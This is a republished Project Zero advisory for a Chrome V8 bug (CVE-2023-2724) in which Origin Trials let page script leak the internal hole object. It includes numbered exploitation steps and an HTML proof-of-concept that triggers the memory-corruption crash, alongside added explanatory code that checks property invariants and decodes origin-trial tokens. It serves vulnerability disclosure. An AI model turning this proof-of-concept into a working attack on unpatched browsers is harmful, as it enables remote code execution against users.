Chrome Internal JavaScript Object Access Via Origin Trials

Chrome suffers from an internal JavaScript object access vulnerability that can lead to code execution.

Packet Storm

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS

  1. JSObject::DefineAccessor doesn’t ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.
  2. The function is reachable from IDLMemberInstaller::InstallAttributes:
     IDLMemberInstaller::InstallAttributes ->
     InstallAttribute ->
     Object::SetAccessorProperty ->
     JSObject::DefineAccessor
  3. When an origin trial is activated through a meta tag, InstallAttributes might be called on a JS object that has already been modified by the user code.
  4. Some origin trials install attributes directly on the global object.
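The object-state checks that DefineAccessor skipped are the ordinary ECMAScript invariants for extensibility and configurability. The following is an added example, not code from the report, showing what a conforming engine must do when the same redefinitions are attempted through Reflect.defineProperty: the calls return false and the object is left untouched. The global property name p0ExampleFixed is an arbitrary name chosen for this example.

```javascript
// Added example: the invariants a property (re)definition must respect.
// A correct engine rejects (1) turning a non-configurable data property into
// an accessor, (2) deleting a non-configurable property, and (3) adding any
// property to a non-extensible object. The bug in the report bypassed exactly
// these checks on the accessor-install path used by origin trials.
'use strict';

function checkDefineInvariants() {
  const obj = {};

  // (1) A non-configurable data property must not become an accessor.
  Object.defineProperty(obj, 'fixed', {
    value: 1, writable: true, configurable: false, enumerable: true,
  });
  const redefinedAsAccessor = Reflect.defineProperty(obj, 'fixed', {
    get() { return 2; }, configurable: true,
  });
  const stillDataProperty =
    Object.getOwnPropertyDescriptor(obj, 'fixed').get === undefined;

  // (2) Deleting it must fail as well.
  const deleted = Reflect.deleteProperty(obj, 'fixed');

  // (3) A non-extensible object must not accept a brand-new accessor.
  Object.preventExtensions(obj);
  const extended = Reflect.defineProperty(obj, 'added', {
    get() { return 3; }, configurable: true,
  });
  const hasAdded = Object.prototype.hasOwnProperty.call(obj, 'added');

  // The report's setting: a non-configurable property on the global object
  // (name chosen for this example) must not be flipped back to configurable.
  Object.defineProperty(globalThis, 'p0ExampleFixed', {
    value: {}, writable: true, configurable: false,
  });
  const globalReconfigured = Reflect.defineProperty(
    globalThis, 'p0ExampleFixed', { configurable: true });
  const globalDeleted = Reflect.deleteProperty(globalThis, 'p0ExampleFixed');

  return {
    redefinedAsAccessor,   // false
    stillDataProperty,     // true
    deleted,               // false
    extended,              // false
    hasAdded,              // false
    globalReconfigured,    // false
    globalDeleted,         // false
    invariantsHeld: !redefinedAsAccessor && stillDataProperty && !deleted &&
      !extended && !hasAdded && !globalReconfigured && !globalDeleted,
  };
}

console.log(checkDefineInvariants());
```

Every flag above is a spec-mandated outcome; an engine in which any of them comes out the other way has the same class of inconsistency the report describes, since compiled code may already depend on the property never changing shape.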

To exploit the issue:

  1. Add a non-configurable property to the global object.
  2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.
  3. Enable an origin trial that redefines the property as configurable.
  4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION
Google Chrome 112.0.5615.49 (Official Build) (arm64)
Chromium 114.0.5713.0 (Developer Build) (64-bit)

REPRODUCTION CASE

<body>
<script>
var container = [{}];
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(
    globalThis,
    'documentPictureInPicture',
    { configurable: false, writable: true, value: {} });
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.
for (let i = 0; i < 50000; i++) trigger();

// The "Document Picture-in-Picture" origin trial force-sets the `documentPictureInPicture` property
// on the global object.
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content =
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';
document.head.appendChild(meta);

delete documentPictureInPicture;
trigger();
container[0].prop; // Trying to access a property of the hole object should cause a crash.
</script>
</body>
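The trigger in the reproduction case is an Origin-Trial meta tag, so a reviewer auditing a page wants to know which trial a token enables, for which origin, and whether it is still valid. The following is an added example for Node.js, not part of the report, that decodes a token's public fields using the documented Chrome token layout (one version byte, a 64-byte Ed25519 signature, a 4-byte big-endian payload length, then a JSON payload) and scans static HTML for such tags. It does not verify the signature, which would require Chrome's embedded public key. The token is the one from the reproduction case above; the HTML snippet is constructed for the example.

```javascript
// Added example: decode the public fields of a Chrome Origin-Trial token and
// list the tokens declared in a static HTML document. Signature NOT verified.
'use strict';

// The token from the reproduction case above.
const EXAMPLE_TOKEN =
  'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +
  'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +
  'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';

const HEADER_LEN = 1 + 64 + 4; // version + Ed25519 signature + payload length

function decodeOriginTrialToken(token, now = Math.floor(Date.now() / 1000)) {
  const buf = Buffer.from(token, 'base64');
  if (buf.length < HEADER_LEN) throw new Error('token too short');
  const version = buf[0];
  if (version !== 2 && version !== 3) throw new Error(`unsupported token version ${version}`);
  const signature = buf.subarray(1, 65);
  const payloadLength = buf.readUInt32BE(65);
  if (HEADER_LEN + payloadLength !== buf.length) throw new Error('payload length mismatch');
  const payload = JSON.parse(buf.subarray(HEADER_LEN).toString('utf8'));
  return {
    version,
    signatureHex: signature.toString('hex'), // not checked here
    origin: payload.origin,
    feature: payload.feature,
    expiry: payload.expiry,                   // Unix seconds
    expired: payload.expiry <= now,
    payload,
  };
}

// Find Origin-Trial <meta> tags in static HTML and decode each token.
// Tags injected at runtime (as the reproduction case does with
// document.createElement) are only visible when the live DOM is inspected.
function originTrialsInHtml(html, now) {
  const results = [];
  const attr = (tag, name) => {
    const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
    const m = re.exec(tag);
    return m ? (m[1] ?? m[2] ?? m[3]) : undefined;
  };
  for (const [tag] of html.matchAll(/<meta\b[^>]*>/gi)) {
    if ((attr(tag, 'http-equiv') || '').toLowerCase() !== 'origin-trial') continue;
    const content = attr(tag, 'content');
    if (!content) continue;
    try {
      results.push(decodeOriginTrialToken(content.replace(/\s+/g, ''), now));
    } catch (e) {
      results.push({ error: e.message, raw: content });
    }
  }
  return results;
}

// Constructed sample document carrying the token above plus an unrelated meta tag.
const SAMPLE_HTML = `<!doctype html><html><head>
<meta http-equiv="Origin-Trial" content="${EXAMPLE_TOKEN}">
<meta name="viewport" content="width=device-width">
</head><body></body></html>`;

console.log(JSON.stringify(originTrialsInHtml(SAMPLE_HTML), null, 2));
```

For the token above the decoder reports version 2, feature DocumentPictureInPictureAPI, origin http://localhost:8000 and an expiry of 1694131199 (September 2023), which is why a present-day run flags it as expired; the reproduction case therefore only works on a build from before that date, or with a freshly issued token.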

CREDIT INFORMATION
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: [email protected]

CVE-2023-2724

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)